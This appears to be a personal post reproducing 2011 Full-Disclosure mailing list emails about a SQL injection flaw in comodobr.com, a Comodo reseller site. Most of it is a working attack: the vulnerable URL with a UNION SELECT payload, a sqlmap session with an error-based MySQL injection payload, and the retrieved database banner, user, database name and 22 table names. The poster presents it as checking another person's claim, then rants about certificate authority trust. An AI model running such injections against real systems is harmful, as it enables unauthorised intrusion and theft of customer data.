Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP; Sun, 22 May 2011 11:20:54 PDT X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096 Date: Sun, 22 May 2011 11:20:54 -0700 (PDT) From: Hgkdfhklj Jdhglkjfdhg X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100 Cc: suporte@comodobr.com Subject: [Full-disclosure] comodobr.com sqli vulnerable link: https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- - http://pastebin.com/9qwdL1pA _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ --------------------------------------------------------------------- PS C:\Python27> nslookup 199.48.147.35 Server: google-public-dns-a.google.com Address: 8.8.8.8 Name: tor-exit-router35-readme.formlessnetworking.net Address: 199.48.147.35 >>> You're not going to find him... <<< >>> Let's check the host: <<<>>><<<>>>< PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 21:00:00 Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 POST data (--data) [Enter for None]: Injection difficulty (--level/--risk). Please choose: [1] Normal (default) [2] Medium [3] Hard > 1 Enumeration (--banner/--current-user/etc). Please choose: [1] Basic (default) [2] Smart [3] All > 1 sqlmap is running, please wait.. sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: prod Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198) THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --- [21:00:00] [INFO] retrieved: 5.0.91-community-log web application technology: PHP 5.2.6, Apache 2.0.63 back-end DBMS: MySQL 5.0 banner: '5.0.91-community-log' [21:00:00] [INFO] retrieved: comodobr_site@localhost current user: 'comodobr_site@localhost' [21:00:00] [INFO] retrieved: comodobr_comodobr current database: 'comodobr_comodobr' current user is DBA: 'False' [*] shutting down at: 21:00:00 PS C:\Python27> >>> Looks real <<<>>><<<>>><<<>>><<<>>> >>> Let's see the inside of the db: <<< web application technology: PHP 5.2.6, Apache 2.0.63 back-end DBMS: MySQL 5.0 banner: '5.0.91-community-log' current user: 'comodobr_site@localhost' current database: 'comodobr_comodobr' current user is DBA: 'False' [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto_associa [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto_categoria [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto_importado [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto_status [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_confirm_pago [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_contab [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_expected_delivery_time [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_hosting_contas [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_meios_pago [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_pedido_status [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_pedido_status_codes [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_pedidos [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_pedidos_historico [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_prod_grupos [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_prods [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_resellers [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_server_software [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_users [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_vw_crm_clientes [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_webhostreport_item [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_webhostreport_subitem Database: comodobr_comodobr [22 tables] +-------------------------------+ | comodo_boleto | | comodo_boleto_associa | | comodo_boleto_categoria | | comodo_boleto_importado | | comodo_boleto_status | | comodo_confirm_pago | | comodo_contab | | comodo_expected_delivery_time | | comodo_hosting_contas | | comodo_meios_pago | | comodo_pedido_status | | comodo_pedido_status_codes | | comodo_pedidos | | comodo_pedidos_historico | | comodo_prod_grupos | | comodo_prods | | comodo_resellers | | comodo_server_software | | comodo_users | | comodo_vw_crm_clientes | | comodo_webhostreport_item | | comodo_webhostreport_subitem | +-------------------------------+ [*] shutting down at: 21:00:00 PS C:\Python27> When are comodo going to fix this? How come comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from paypal, google, etc? Why does Firefox restore all my CA's, when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next? GET YOUR SHIT TOGETHER. EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles I've just checked his claims, which was true. Everyone can claim that they hacked comodo, but that the vulnerable was fixed, so all I have done is open sqlmap and tested :-) Also here's a new response: Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP; Tue, 24 May 2011 14:58:39 PDT X-Mailer: YahooMailWebService/0.8.111.303096 Date: Tue, 24 May 2011 14:58:39 -0700 (PDT) From: Hgkdfhklj Jdhglkjfdhg Cc: "support@comodobr.com" Subject: [Full-disclosure] My comments on comodobr.com I have to agree with Comodo president and CEO, Melih Abdulhayoglu. In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli. However the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten own their own security. further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems. Just my 50 cents [Edit] The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSR's and client info shouldn't be "readily available" as this. No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own. That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help. http://pastebin.com/MFSUdCnk _______________________________________________ Full-Disclosure - We believe in it. Hosted and sponsored by Secunia - http://secunia.com/ PS C:\Users\Nicolai> nslookup 199.48.147.35 Server: google-public-dns-a.google.com Address: 8.8.8.8 Name: tor-exit-router35-readme.formlessnetworking.net Address: 199.48.147.35 PS C:\Users\Nicolai>